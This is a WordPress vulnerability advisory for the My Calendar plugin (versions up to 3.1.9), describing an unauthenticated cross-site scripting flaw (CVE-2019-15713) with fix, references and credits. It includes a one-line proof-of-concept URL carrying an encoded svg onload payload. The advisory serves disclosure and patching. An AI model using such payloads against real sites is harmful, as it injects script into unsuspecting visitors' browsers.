My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS)



Description
Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
Proof of Concept
http://www.domain.de/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm(%2FOPENBUGBOUNTY%2F)%3E

Affects Plugin

fixed in version 3.1.10

References

CVE 2019-15713
URL https://plugins.trac.wordpress.org/changeset/2078031/my-calendar

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Andreas Hell
Submitter Joe Dolson
Submitter Website https://www.joedolson.com
Submitter Twitter joedolson
Views 6127
Verified No
WPVDB ID 9267

Timeline

Publicly Published 2019-04-30 (7 months ago)
Added 2019-05-03 (7 months ago)
Last Updated 2019-11-01 (13 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin